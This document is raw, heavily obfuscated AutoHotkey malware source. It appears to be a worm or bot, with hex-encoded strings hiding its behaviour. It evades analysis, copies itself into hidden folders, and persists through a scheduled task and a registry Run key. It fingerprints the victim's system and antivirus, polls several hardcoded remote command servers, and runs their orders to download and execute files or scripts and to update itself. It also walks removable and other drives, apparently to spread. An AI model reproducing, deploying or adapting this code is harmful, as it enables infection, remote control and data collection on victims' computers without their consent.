;nzfkteaqykklutlvbyxazcjhfjaanhhsvulzxumahejkyfrfgnfujshibptlohuavrouggscnrrkqmixiimrrscmcfwtecagmrbydjltjopoxjdofyswwsuujpsvvcihurvrwnucaqtfnhpnvvkqih

global kf@aa#wnlh := 4
global @k@fkf#kk# := SubStr(A_ScriptName, 1, InStr(A_ScriptName, ".", False, -1) -1)
global f@aa#wnlhfk@k# := ComObjCreate(@k@kfkfk@kkkff("575363726970742E5368656C6C"))
global kkaa#wnlhk#kk#f# := @k@kfkfk@kkkff("726164")
global k@f@k@kk := @k@kfkfk@kkkff("73797374656D666978")
global k@f#fkfk := @k@fkf#kk#
global kf#aa#wnlhk@kf#f := @kf@ffkkf#kkf#(21)
global f@k#k@k@ := @kf@ffkkf#kkf#(21)
global kf#fkkk@#kk@ := @kf@ffkkf#kkf#(150)
global k#f@ffkk#k := @kf@ffkkf#kkf#(150)
global k@@f#k@kfk := ComObjCreate(@k@kfkfk@kkkff("536372697074696E672E46696C6553797374656D4F626A656374"))
global f@f@k@ := @k@fkf#kk# . @k@kfkfk@kkkff("2E657865")
global k#k#@kf##k := @k@fkf#kk# . @k@kfkfk@kkkff("2E747874")
global @kf@kk@fkkk# := 0
global aaawnlhfk#k@k@k@ := 0
global @aa#wnlhk@aaawnlhf@f := @k@kfkfk@kkkff("787878")
k#@kfkffk@ := 0
if (kf@aa#wnlh = 1){
}else{
if StrLen(A_ScriptName) <> 25
{
exitapp
}
IfInString, A_ScriptDir, % @k@kfkfk@kkkff("433A5C")
{
@kkf#f#f@aa@wnlh := A_TickCount
while 1 {
Sleep, 1000
f@@f#f@fkfk# := A_TickCount - @kkf#f#f@aa@wnlh
if (f@@f#f@fkfk# > 120000)
{
break
}
}
if StrLen(A_ScriptFullPath) <> 50
{
exitapp
}
}else{
}
for process in ComObjGet(@k@kfkfk@kkkff("77696E6D676D74733A")).ExecQuery(@k@kfkfk@kkkff("53656C656374202A2066726F6D2057696E33325F50726F63657373")) {
f##kk@#k := process.Name
#k#f@kf#@f := process.CommandLine
#f#k#kkf := process.ExecutablePath
if (StrLen(f##kk@#k) = 25){
if (StrLen(#k#f@kf#@f) > 30){
IfInString, #k#f@kf#@f, % @k@kfkfk@kkkff("2E747874")
{
k#@kfkffk@ := k#@kfkffk@ + 1
if (StrLen(#f#k#kkf) = 50){
}
}
}
}
}
if (k#@kfkffk@ > 1){
exitapp
}
IfInString, A_ScriptDir, % @k@kfkfk@kkkff("433A5C")
{
}else{
FileCopyDir, %A_ScriptDir%, C:\%f@k#k@k@%%@k@f%%aa@wnlhf%
FileCopyDir, %A_ScriptDir%, C:\%k#fkkk%%kf#aa#wnlhk@kf#f%%k@k@f#kf%
FileSetAttrib, +SH, C:\%k@fk@f%%f@k#k@k@%%fk@fkk%,1
FileSetAttrib, +SH, C:\%k#fkkk%%f#f@@k%%kf#aa#wnlhk@kf#f%,1
FileMove, % @k@kfkfk@kkkff("433A5C") . f@k#k@k@ . @k@kfkfk@kkkff("5C") . @k@fkf#kk# . @k@kfkfk@kkkff("2E657865") , % @k@kfkfk@kkkff("433A5C") . f@k#k@k@ . @k@kfkfk@kkkff("5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("2E657865")
FileMove, % @k@kfkfk@kkkff("433A5C") . f@k#k@k@ . @k@kfkfk@kkkff("5C") . @k@fkf#kk# . @k@kfkfk@kkkff("2E747874") , % @k@kfkfk@kkkff("433A5C") . f@k#k@k@ . @k@kfkfk@kkkff("5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("2E747874")
FileMove, % @k@kfkfk@kkkff("433A5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("5C") . @k@fkf#kk# . @k@kfkfk@kkkff("2E657865") , % @k@kfkfk@kkkff("433A5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("2E657865")
FileMove, % @k@kfkfk@kkkff("433A5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("5C") . @k@fkf#kk# . @k@kfkfk@kkkff("2E747874") , % @k@kfkfk@kkkff("433A5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("2E747874")
ffk#k##aa#wnlh#f := ";"
FileAppend, `n %#kf#fkk@%%ffk#k##aa#wnlh#f%%fkkfkk% %f@#k%%kf#fkkk@#kk@%%#aaawnlhf#k@%, C:\%f@k#k@k@%%@f#k@k%%#kk#fkk@%\%k#k#%%kf#aa#wnlhk@kf#f%%fkk##f%.txt
k#aaawnlh#ff := FileOpen(@k@kfkfk@kkkff("433A5C") . f@k#k@k@ . @k@kfkfk@kkkff("5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("2E747874"), 0)
#k#ffkfkfk := k#aaawnlh#ff.Read()
#k#ffkfkfk := kkk##ffkf#kffkk@(#k#ffkfkfk)
k#aaawnlh#ff.Close()
kfkk@fkk#aa#wnlh := FileOpen(@k@kfkfk@kkkff("433A5C") . f@k#k@k@ . @k@kfkfk@kkkff("5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("2E747874"), 5)
kfkk@fkk#aa#wnlh.WriteLine(ffk#k##aa#wnlh#f . k#f@ffkk#k)
kfkk@fkk#aa#wnlh.Write(#k#ffkfkfk)
kfkk@fkk#aa#wnlh.Close()
run % @k@kfkfk@kkkff("433A5C") . f@k#k@k@ . @k@kfkfk@kkkff("5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("2E65786520433A5C") . f@k#k@k@ . @k@kfkfk@kkkff("5C") . kf#aa#wnlhk@kf#f . @k@kfkfk@kkkff("2E747874")
exitapp
}
#ffkfk#k@ffkk#()
k@fkffk##fkkff()
}
@kffkkkf := Object()
@kffkkkf.Insert(@k@kfkfk@kkkff("687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39383938"))
@kffkkkf.Insert(@k@kfkfk@kkkff("687474703A2F2F7375706572616C7068612E7261646E65776167652E636F6D3A39383938"))
@kffkkkf.Insert(@k@kfkfk@kkkff("687474703A2F2F7375706572616C7068612E6E65776D696E6572736167652E636F6D3A33333333"))
@kffkkkf.Insert(@k@kfkfk@kkkff("687474703A2F2F6E6577616C7068612E73757065722D67616D657A65722E636F6D3A39333333"))
@kffkkkf.Insert(@k@kfkfk@kkkff("687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39393939"))
@kffkkkf.Insert(@k@kfkfk@kkkff("687474703A2F2F6E6F6F626D696E65722E7075626C6963766D2E636F6D3A39383938"))
@kfkffk# := @kffkkkf.MaxIndex()
kf#kkf@k#aa#wnlh := 0
while 1 {
if (kf#kkf@k#aa#wnlh = @kfkffk#){
kf#kkf@k#aa#wnlh := 1
}else{
kf#kkf@k#aa#wnlh := kf#kkf@k#aa#wnlh + 1
}
k@fkffk##fkkff()
f@fk@k@kaa#wnlhfk@k#(@kffkkkf[kf#kkf@k#aa#wnlh])
}
f@fk@k@kaa#wnlhfk@k#(k@@ffk#kfk#k){
k##fk@f##fkf = 0
while 1 {
k@fkffk##fkkff()
if (k##fk@f##fkf = 6){
break
}
@k#ffkkkkf := #f@kf@k#@kfkf#(k@@ffk#kfk#k)
if (@k#ffkkkkf = @k@kfkfk@kkkff("4552524F52")){
k##fk@f##fkf := k##fk@f##fkf + 1
f#@kf@kaaawnlhk@k@f#(@k@kfkfk@kkkff("636F756C646E7420636F6E6E65637420746F20") . k@@ffk#kfk#k . "-" . @k#ffkkkkf)
}else{
kf@k@fk@k@@f := kf@ffk@k#kaa#wnlhkk#(@k#ffkkkkf)
if (kf@k@fk@k@@f = ""){
k##fk@f##fkf := k##fk@f##fkf + 1
f#@kf@kaaawnlhk@k@f#(@k@kfkfk@kkkff("636F756C646E742066696E6420636F6D6D616E6420696E20") . k@@ffk#kfk#k . "-" . @k#ffkkkkf)
}else{
k##fk@f##fkf := 0
f#@kf@kaaawnlhk@k@f#(@k@kfkfk@kkkff("636F6E6E656374656420746F202022202E2061646472657373202E202220646174613A20") . kf@k@fk@k@@f)
@kfk#fk@f#fk@aaawnlh(@k#ffkkkkf)
}
}
}
}
#f@kf@k#@kfkf#(k@k@k#@kffk#) { 
static f#@kkaa@wnlhf@kf := ComObjCreate(@k@kfkfk@kkkff("57696E487474702E57696E48747470526571756573742E352E31"))
try {
f#@kkaa@wnlhf@kf.Open(@k@kfkfk@kkkff("474554"), k@k@k#@kffk# . "/" . k@kkk@k@aaawnlhaa#wnlhkk() , true)
f#@kkaa@wnlhf@kf.Send()
f#@kkaa@wnlhf@kf.WaitForResponse()
} catch {
return @k@kfkfk@kkkff("4552524F52")
}
if (f#@kkaa@wnlhf@kf.Status = 200){
return f#@kkaa@wnlhf@kf.ResponseText
}else{
return @k@kfkfk@kkkff("4552524F52")
}
}
kaa#wnlhk#kkk#fk(){
try {
For objOS In ComObjGet(@k@kfkfk@kkkff("77696E6D676D74733A5C5C6C6F63616C686F73745C726F6F745C736563757269747963656E74657232")).InstancesOf(@k@kfkfk@kkkff("416E7469566972757350726F64756374")) {
k@@kf@f@kfk@ := ObjOS.displayName
}
} catch {
return "Unknown"
}
return k@@kf@f@kfk@
}
fkfk@kf#@ffk#k#f(){
try {
For objOS In ComObjGet(@k@kfkfk@kkkff("77696E6D676D74733A5C5C")).InstancesOf(@k@kfkfk@kkkff("57696E33325F4F7065726174696E6753797374656D")) {
k@#fkaaawnlhff := ObjOS.Caption
}
} catch {
return "Unknown"
}
return k@#fkaaawnlhff
}
f#@kf@kaaawnlhk@k@f#(k#f@k#@kk#fk){

}
kaa#wnlh#f#f#aaawnlhkfkk(kk#f#f#f@aa@wnlhfk) { 
local f#aaawnlhk#f, fkk#kaa@wnlhf#, aa#wnlhkf#@f
If !kk#f#f#f@aa@wnlhfk
Return 0
f#aaawnlhk#f := A_FormatInteger
SetFormat, INTEGER, H
Loop, Parse, kk#f#f#f@aa@wnlhfk
{
fkk#kaa@wnlhf# := Asc(A_LoopField)
StringTrimLeft, fkk#kaa@wnlhf#, fkk#kaa@wnlhf#, 2
aa#wnlhkf#@f .= fkk#kaa@wnlhf# . ""
}
SetFormat, INTEGER, %k#fkkk%%f#aaawnlhk#f%%fk@fkk%
Return aa#wnlhkf#@f
}
urlsafe_b64decode(k##kkf)
{
Return kk#f#f@k#kk#f@fk(k##kkf, "-_")
}
f@f#fkf#f@@f@kk#(kk@kf@kf#k#f@k, k@@kfkffk@k#kf@f:="+/") { 
StringLeft, k@@kfkffk@k#kf@f, k@@kfkffk@k#kf@f, 2
Return @kk@#k@kkfk@#f(kk@kf@kf#k#f@k, @k@kfkfk@kkkff("4142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A30313233343536373839") . k@@kfkffk@k#kf@f)
}
kk#f#f@k#kk#f@fk(kfkf@kkkkf#fkk#k, @aa#wnlh@f@kf@ff:="+/") { 
StringLeft, @aa#wnlh@f@kf@ff, @aa#wnlh@f@kf@ff, 2
Return @kk@aaawnlh@@kf#(kfkf@kkkkf#fkk#k, @k@kfkfk@kkkff("4142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A30313233343536373839") . @aa#wnlh@f@kf@ff)
}
@kk@#k@kkfk@#f(kf@f#f#k@k#f, #f@ffk@f@k#kfkf#:=""){
StringCaseSense On
Loop, Parse, kf@f#f#k@k#f
{
#k@fk@@fk@#f := Mod(A_Index, 3)
if (#k@fk@@fk@#f = 1)
{
aa#wnlhfkkkf@kff := ((Asc(A_LoopField) >> 2) & 0x3F)
#fkkff := (Asc(A_LoopField) & 0x03 ) << 4
}
else if (#k@fk@@fk@#f = 2)
{
aa#wnlhfkkkf@kff := #fkkff | ((Asc(A_LoopField) >> 4) & 0x0F)
#fkkff := (Asc(A_LoopField) & 0x0F) << 2
}
else
{
aa#wnlhfkkkf@kff := #fkkff | ((Asc(A_LoopField) >> 6) & 0x03)
StringMid, base64Char, #f@ffk@f@k#kfkf#, aa#wnlhfkkkf@kff + 1, 1
k##kkf := k##kkf base64Char
aa#wnlhfkkkf@kff := (Asc(A_LoopField)) & 0x3F
}
StringMid, base64Char, #f@ffk@f@k#kfkf#, aa#wnlhfkkkf@kff + 1, 1
k##kkf := k##kkf base64Char
}
if (#k@fk@@fk@#f = 1)
{
StringMid, base64Char, #f@ffk@f@k#kfkf#, #fkkff + 1, 1
return k##kkf base64Char "=="
}
else if (#k@fk@@fk@#f = 2)
{
StringMid, base64Char, #f@ffk@f@k#kfkf#, #fkkff + 1, 1
return k##kkf base64Char "="
}
else
{
return k##kkf "=="
}
}
@kk@aaawnlh@@kf#(kkk@kaa#wnlh@kk#kf, #aaawnlhf#k#aa#wnlhf:=""){
StringReplace kkk@kaa#wnlh@kk#kf, kkk@kaa#wnlh@kk#kf, =,,All
StringReplace, kkk@kaa#wnlh@kk#kf, kkk@kaa#wnlh@kk#kf, `r,,All
StringReplace, kkk@kaa#wnlh@kk#kf, kkk@kaa#wnlh@kk#kf, `n,,All
StringCaseSense On
Loop, Parse, kkk@kaa#wnlh@kk#kf
{
StringGetPos, currentBin, #aaawnlhf#k#aa#wnlhf, %A_LoopField%
@aaawnlhk#kf := Mod(A_Index, 4)
if (@aaawnlhk#kf = 1)
{
#fkkff := currentBin << 2
}
else if (@aaawnlhk#kf = 2)
{
ffk@ffkk := ffk@ffkk Chr(#fkkff | (currentBin >> 4))
#fkkff := (currentBin & 0x0F) << 4
}
else if (@aaawnlhk#kf = 3)
{
ffk@ffkk := ffk@ffkk Chr(#fkkff | (currentBin >> 2))
#fkkff := (currentBin & 0x03) << 6
}
else
{
ffk@ffkk := ffk@ffkk Chr(#fkkff | currentBin)
}
}
Return ffk@ffkk
}
#ffkfk#k@ffkk#() {
@ffkf@kk@f := A_ScriptDir . "\" . @k@fkf#kk# . @k@kfkfk@kkkff("2E657865")
@kk@f##k@f := @aa@wnlh#ffkkffkk@(A_ScriptDir . "\" . @k@fkf#kk# . @k@kfkfk@kkkff("2E747874"))
#k#kk@f##fk@ := @k@kfkfk@kkkff("7363687461736B73202F637265617465202F7363206D696E757465202F6D6F2031202F746E")
run, %#k#kk@f##fk@%%@kk@f#ff%%@kk@f#ff% %f@kkk@%%#kk#fkkk%%k@f#fkfk% /tr "%@ffkf@kk@f%%#kk#fkk@%%f#f@@k% %f@kk%%@kk@f##k@f%%k#k#%",,Hide
Sleep, 3000
f#@aa@wnlhk#kk@k := @k@kfkfk@kkkff("7363687461736B732E657865")
Process, Close, %@f#k@k%%kffk#fk@%%f#@aa@wnlhk#kk@k%
RegWrite, % @k@kfkfk@kkkff("5245475F535A") , % @k@kfkfk@kkkff("484B4355"), % @k@kfkfk@kkkff("536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E"), %kk@kkf%%kk@kkf%%k@f#fkfk%, %@ffkf@kk@f%%kk@kkf%%@aa@wnlhkk#f% %@kk@f##k@f%%fk@fkk%%#kk#fkk@%
}
#aa#wnlh@f@kkk#kkk(fk@k#kk#kaaawnlhaa@wnlhk){
Process,Exist,%#kkk%%fk@k#kk#kaaawnlhaa@wnlhk%%@f#k@k%
return Errorlevel
}
fkaa@wnlhkf#f#f@kf#k(){
kk@f#kkaa#wnlh@f := #f@f@k#aa@wnlhkf(kk@aa@wnlh@f@kf@() . A_OSVersion  . fkfk@kf#@ffk#k#f())
return SubStr(kk@f#kkaa#wnlh@f, 1, 30)
}
kk@aa@wnlh@f@kf@(){
try {
DriveGet, hSerial, Serial, C:
} catch {
return @k@kfkfk@kkkff("556E6B6E6F776E")
}
return hSerial
}
k@@k#kkf@k@f@kkk(){
if  ( #aa#wnlh@f@kkk#kkk(@k@kfkfk@kkkff("73747265616D65722E657865")) or #aa#wnlh@f@kkk#kkk(@k@kfkfk@kkkff("6C697665776F726B65722E657865")) or #aa#wnlh@f@kkk#kkk(@k@kfkfk@kkkff("7375706572636865636B65722E657865")) or #aa#wnlh@f@kkk#kkk(@k@kfkfk@kkkff("737065656475702E657865")) or #aa#wnlh@f@kkk#kkk(@k@kfkfk@kkkff("6E6F76612E657865"))){
return 1
}
return 0
}
aaawnlhaaawnlhfk@kaaawnlh@@k(){
if  #aa#wnlh@f@kkk#kkk(@k@kfkfk@kkkff("637075636865636B65722E657865")) or #aa#wnlh@f@kkk#kkk(@k@kfkfk@kkkff("637075636865636B657233322E657865"))
{
return 1
}
return 0
}
k@kkk@k@aaawnlhaa#wnlhkk(){
kkf@@fkk := f@aa#wnlhfk@k#.ExpandEnvironmentStrings(@k@kfkfk@kkkff("25434F4D50555445524E414D4525"))
f#k@kk := f@aa#wnlhfk@k#.ExpandEnvironmentStrings(@k@kfkfk@kkkff("25555345524E414D4525"))
spreadisrun := k@@k#kkf@k@f@kkk()
@aa#wnlhf@fk := fkfk@kf#@ffk#k#f()
ffkkf##aa#wnlh := aaawnlhaaawnlhfk@kaaawnlh@@k()
kf#fk@aa#wnlhf := kaa#wnlhk#kkk#fk()
aa#wnlhkkkk##fk@ := fkaa@wnlhkf#f#f@kf#k() . @k@kfkfk@kkkff("2F312F") . #f@f@k#aa@wnlhkf(@aa#wnlhf@fk)  . "/" . #f@f@k#aa@wnlhkf(kkf@@fkk) . "/" . #f@f@k#aa@wnlhkf(f#k@kk)  . "/" .  #f@f@k#aa@wnlhkf(kkaa#wnlhk#kk#f#)  . "/" .   #f@f@k#aa@wnlhkf(k@@kf@f@kfk@)  . "/" .  spreadisrun  . "/" .  ffkkf##aa#wnlh
return aa#wnlhkkkk##fk@
}
#f@f@k#aa@wnlhkf(f@fkkk@kf#@kf#){
f@fkkk@kf#@kf# := kaa#wnlh#f#f#aaawnlhkfkk(f@f#fkf#f@@f@kk#(f@fkkk@kf#@kf#))
return f@fkkk@kf#@kf#
}
kf@ffk@k#kaa#wnlhkk#(kfk@fkaa#wnlhk@k){
try {
f@f#f@:=RegExMatch(kfk@fkaa#wnlhk@k, @k@kfkfk@kkkff("3A3A283F503C4E616D653E2E2A3F293A3A"), match)
} catch {
return ""
}
return matchName
}
kk@aa@wnlh@k@kfkf@#f(@kf@@k#fk@kaa#wnlh#k) { 
#f#kaa#wnlhkf#@f := ""
kk@kkffk@k:=1
Loop % StrLen(@kf@@k#fk@kaa#wnlh#k)/2	{
aaawnlhf@f := SubStr(@kf@@k#fk@kaa#wnlh#k, kk@kkffk@k , 2)
#f#kaa#wnlhkf#@f .= Chr("0x" aaawnlhf@f)
kk@kkffk@k +=2
}
Return #f#kaa#wnlhkf#@f
}
fkf##f#k@fk@k#(kf@k@kkkk@f#kk,fkf@f@#f@aa#wnlhkk,kaa#wnlh@kf#@k#kkf){
try {
fkf#ff:=RegExMatch(kf@k@kkkk@f#kk, fkf@f@#f@aa#wnlhkk . @k@kfkfk@kkkff("283F503C4E616D653E2E2A3F29") . kaa#wnlh@kf#@k#kkf, match)
} catch {
return ""
}
return matchName
}
@kfk#fk@f#fk@aaawnlh(kkaaawnlhkf@kk@k){
f#@kf@kaaawnlhk@k@f#(@k@kfkfk@kkkff("67657420636F6D6D616E64") . kk#f#f@k#kk#f@fk(kk@aa@wnlh@k@kfkf@#f(kkaaawnlhkf@kk@k)))
#fkkfk := kk#f#f@k#kk#f@fk(kk@aa@wnlh@k@kfkf@#f(kkaaawnlhkf@kk@k))
k#f@k@@aaawnlhf# := @k@kfkfk@kkkff("433A5C") . @k@fkf#kk#
if (FileExist(k#f@k@@aaawnlhf#)) {
}else{
k#f@k@@aaawnlhf# := A_ScriptDir
}
f@f#@fk@@kf@ := @k@kfkfk@kkkff("7570646174652D")
fkkfk@@k := @k@kfkfk@kkkff("646F776E6C6F61642D")
f#kf@k#ffk := @k@kfkfk@kkkff("7363726970742D")
f#kk@aa@wnlhk@ := @k@kfkfk@kkkff("75706461746573656C662D")
IfInString, #fkkfk, %f@f#@fk@@kf@%%#kk#@k%%@aa@wnlhkkkf%
{
@k@kk@#k := fkf##f#k@fk@k#(#fkkfk,@k@kfkfk@kkkff("7570646174652D"),@k@kfkfk@kkkff("2D757064617465"))
f@k@k#@k := @k@kfkfk@kkkff("5C") . @kf@ffkkf#kkf#(10) . @k@kfkfk@kkkff("2E747874")
if FileExist(A_ScriptDir . @k@kfkfk@kkkff("5C") . f@k@k#@k){
FileDelete ,%A_ScriptDir%\%f#f@k@f#%%f@k@k#@k%%kaa@wnlhfkkf%
}
f#@kf@kaaawnlhk@k@f#(@k@kfkfk@kkkff("646F776E6C6F6164696E672075706461746520") . f@k@k#@k . " - " . @k@kk@#k)
UrlDownloadToFile, %f@@k%%@k@kk@#k%%fkkaa#wnlhk#%, %A_ScriptDir%\%f#@k%%f@k@k#@k%%kk@f@f%
if FileExist(A_ScriptDir . @k@kfkfk@kkkff("5C") . f@k@k#@k){
FileDelete ,%A_ScriptDir%\%k#k#@kf##k%%aaawnlh##k@f%%kf@kkk%
FileMove, %A_ScriptDir%\%f@k@k#@k%%#kk#@k%%k@f#@k%, %A_ScriptDir%\%fkfkk#%%k#k#@kf##k%%fkk##f%
Run,%A_ScriptDir%\%k@fk@f%%f#f@k@f#%%f@f@k@% %A_ScriptDir%\%kkk@fk#f%%k#k#@kf##k%%kfk#fkf#%
exitapp
}
return
}
IfInString, #fkkfk, %k@k@f#kf%%@fkf@f%%fkkfk@@k%
{
aa@wnlhkkk@f#k@k := fkf##f#k@fk@k#(#fkkfk,@k@kfkfk@kkkff("646F776E6C6F61642D"),@k@kfkfk@kkkff("2D646F776E6C6F6164"))
aa@wnlhkkk@f#k@k := StrSplit(aa@wnlhkkk@f#k@k, @k@kfkfk@kkkff("3A213A"))
fkaa#wnlhk := @k@kfkfk@kkkff("5C") . @kf@ffkkf#kkf#(10) . @k@kfkfk@kkkff("2E747874")
@k@k#fk@ := aa@wnlhkkk@f#k@k[1]
f@k@k#@k := aa@wnlhkkk@f#k@k[2]
if FileExist(k#f@k@@aaawnlhf# . @k@kfkfk@kkkff("5C") . f@k@k#@k){
FileDelete ,%#kk#fkkk%%k#f@k@@aaawnlhf#%%kk@kkf%\%#kfk%%f@k@k#@k%%k#k#kffk%
}
f#@kf@kaaawnlhk@k@f#("downloading file " . f@k@k#@k . " - " . @k@k#fk@)
if FileExist(k#f@k@@aaawnlhf# . fkaa#wnlhk){
FileDelete ,%kfk#fkf#%%k@@kff%%k#f@k@@aaawnlhf#%%#k#kkk%%fkaa#wnlhk%%kfkf@aa@wnlh%
}
UrlDownloadToFile, %fkkaa#wnlhk#%%@k@k#fk@%%#fk@%, %k#f@k@@aaawnlhf#%%k#k#kffk%%f#f##k%%@kk@kffk%%@f#k@k%%fkaa#wnlhk%
if FileExist(k#f@k@@aaawnlhf# . fkaa#wnlhk){
FileMove, %k#f@k@@aaawnlhf#%%aaawnlhf#kkk%%kk@aaawnlh%%kfk@#k%%fkaa#wnlhk%%f@f##f%, %k#f@k@@aaawnlhf#%%@kk@kffk%%k@f#@f%\%#aaawnlhf#k@%%f@k@k#@k%%f@f#k@%
IfInString, f@k@k#@k, %@aa#wnlhk@aaawnlhf@f%%aa#wnlhfkf@f%%k@@kff%
{
#k@fkk@f@k := @k@kfkfk@kkkff("433A5C") . @k@fkf#kk# . @k@kfkfk@kkkff("5C") . f@f@k@ . " " . @k@kfkfk@kkkff("433A5C") . @k@fkf#kk# . @k@kfkfk@kkkff("5C") . f@k@k#@k
Run,%#fk@%%#kkk%%#k@fkk@f@k%
}else{
Run,%fkf#f@fk%%k#f@k@@aaawnlhf#%%k#f#kffk%\%f@k@k#@k%%@aa@wnlhkkkf%%k@f#@k%
}
}
return
}
IfInString, #fkkfk, %f#kf@k#ffk%%kf@k%%k#k#kffk%
{
f@fk#fkf := fkf##f#k@fk@k#(#fkkfk,@k@kfkfk@kkkff("7363726970742D"),@k@kfkfk@kkkff("2D736372697074"))
f@fk#fkf := StrSplit(f@fk#fkf, ":!:")
k@aa#wnlhf@kkf := f@fk#fkf[1]
#fkkk#@f := f@fk#fkf[2]
#kf#kk@ffk :=  @k@kfkfk@kkkff("5C") . @kf@ffkkf#kkf#(10) . @k@kfkfk@kkkff("2E747874")
#fk#kfkkkk := k#f@k@@aaawnlhf# . @k@kfkfk@kkkff("5C") . #fkkk#@f
if FileExist(#fk#kfkkkk){
FileDelete ,%#fk#kfkkkk%%f@f##f%%kfk#fkf#%
}
if FileExist(k#f@k@@aaawnlhf# . #kf#kk@ffk){
FileDelete ,%aaawnlhf#kkk%%k#f@k@@aaawnlhf#%%#kkkf@%%#kf#kk@ffk%%kaa@wnlhfkkf%%k@@kff%
}
f#@kf@kaaawnlhk@k@f#("script file " . #fkkk#@f . " - " . k@aa#wnlhf@kkf)
FileAppend, %#kk#fkk@%%k@aa#wnlhf@kkf%%f@#k%, %kfk#@fkk%%kkaa#wnlhk%%k#f@k@@aaawnlhf#%%#kf#kk@ffk%%@f#k%%@fkf@f%
FileMove, %kfk@#k%%k#f@k@@aaawnlhf#%%k@#f%%kfk@#k%%#kf#kk@ffk%%#kkkf@%, %kfk#@fkk%%k#f#kffk%%k#f@k@@aaawnlhf#%\%k#f#fk%%#fkkk#@f%%kkk@fk#f%
IfInString, #fkkk#@f, %k#kaaawnlh%%@k#kff%%@aa#wnlhk@aaawnlhf@f%
{
#k@fkk@f@k := @k@kfkfk@kkkff("433A5C") . @k@fkf#kk# . @k@kfkfk@kkkff("5C") . f@f@k@ . " " .  #fk#kfkkkk
Run,%#k@fkk@f@k%%f#f#%%fk@k@k#f%
}else{
Run,%f@@k%%k#f@k@@aaawnlhf#%%fkaa@wnlhkf#%\%kaa@wnlhfkkf%%#aaawnlhf#k@%%#fkkk#@f%
}
return
}
IfInString, #fkkfk, %@k#kff%%f#kk@aa@wnlhk@%%fk@k@k#f%
{
kf#aa#wnlhk@kf#f  := @k@fkf#kk#
ffk#k##aa#wnlh#f := ";"
FileAppend, `n %f@f#k@%%ffk#k##aa#wnlh#f%%f#f##k% %kf#fkkk@#kk@%%fk@fkk%%k@f#@k%, %A_ScriptFullPath%
@kf##f := FileOpen(A_ScriptFullPath, 0)
kf@f#kfk@kfk := @kf##f.Read()
kf@f#kfk@kfk := kkk##ffkf#kffkk@(kf@f#kfk@kfk)
@kf##f.Close()
aaawnlhaa@wnlhkk := FileOpen(A_ScriptFullPath, 5)
aaawnlhaa@wnlhkk.WriteLine(ffk#k##aa#wnlh#f . k#f@ffkk#k)
aaawnlhaa@wnlhkk.Write(kf@f#kfk@kfk)
aaawnlhaa@wnlhkk.Close()
kf#aa#wnlhk@kf#f := @kf@ffkkf#kkf#(21)
return
}
IfInString, #fkkfk, % @k@kfkfk@kkkff("736C6565702D")
{
fk#fkkaa#wnlhk := fkf##f#k@fk@k#(#fkkfk,@k@kfkfk@kkkff("736C6565702D"),@k@kfkfk@kkkff("2D736C656570"))
f#@kf@kaaawnlhk@k@f#(@k@kfkfk@kkkff("736C656570696E6720") . fk#fkkaa#wnlhk)
@fkffkkaa#wnlh@aaawnlh(fk#fkkaa#wnlhk)
return
}
sleep , 1000
}
@fkffkkaa#wnlh@aaawnlh(@kfk#kaa#wnlhf@ffk@k){
if (kf@aa#wnlh = 1){
sleep , 5000
}else{
sleep @kfk#kaa#wnlhf@ffk@k
}
}
@aa@wnlh#ffkkffkk@(kfk#f#aa@wnlhkkf#f){
try {
VarSetCapacity(SHORT,StrLen(kfk#f#aa@wnlhkkf#f)*2)
DllCall("GetShortPathName","Str",kfk#f#aa@wnlhkkf#f,"Str",SHORT,"UInt",StrLen(kfk#f#aa@wnlhkkf#f)*2)
} catch {
return kfk#f#aa@wnlhkkf#f
}
if (SHORT = "")
{
return kfk#f#aa@wnlhkkf#f
}
Return SHORT
}
@kf@ffkkf#kkf#(k@ffk@ffkfkffk) {
static   c
if   !c
Loop, 26
c .=   (!c ? "" : "`n") Chr(A_Index + 96)
Loop %   k@ffk@ffkfkffk
{
Random, n, 1, 1296
Loop %   n
Sort, c, Random
str .=   SubStr(c,1,1)
}
return   str
}
k@fkffk##fkkff() {
For objOS In k@@f#k@kfk.Drives {
k@kkk@aa#wnlhf := ObjOS.path
if (k@kkk@aa#wnlhf = @k@kfkfk@kkkff("433A")){
}else{
f#f#aa@wnlhk = %k#f#fk%%k@kkk@aa#wnlhf%%k#@aa@wnlh%\*.*
Loop, %f#f@#f%%#kkk%%f#f#aa@wnlhk%
{
aa#wnlhk@aa#wnlh = %A_LoopFileDir%
}
@kf@kk@fkkk# := 0
Loop, %f#f#aa@wnlhk%%@kfk@k@f%%f#f@#f%, 1
{
if (@kf@kk@fkkk# > 0){
if (aaawnlhfk#k@k@k@ > 0){
break
}
}
FileGetAttrib,CurAttrib, %A_LoopFileFullPath%
IfInString, CurAttrib, D
{
StringReplace, A_LoopRelativeFileName, A_LoopFileFullPath, %aa#wnlhk@aa#wnlh%%f@kk%%@fkf@f%,
if (A_LoopRelativeFileName = @k@kfkfk@kkkff("5C2452454359434C452E42494E")){
}else{
#k#k#kkk := SubStr(@k@fkf#kk#, 1, 3)
#k@f#kkk#kfk := A_LoopRelativeFileName
StringReplace, #k@f#kkk#kfk, #k@f#kkk#kfk,  "\",
ifexist, %kk@fk#ff%%kfk@#k%%k@kkk@aa#wnlhf%%A_LoopRelativeFileName%\%#kfk%%kfk#@fkk%%@k@fkf#kk#%
{
FileGetSize, oldfilesize, %k@kkk@aa#wnlhf%%fkaa@wnlhkf#%%fkkaa#wnlhk#%%A_LoopRelativeFileName%\%#k@kff%%#kkkf@%%@k@fkf#kk#%\%kaa@wnlhfkkf%%kkk@fk#f%%@k@fkf#kk#%.txt
FileGetSize, scriptfilesize, %A_ScriptFullPath%
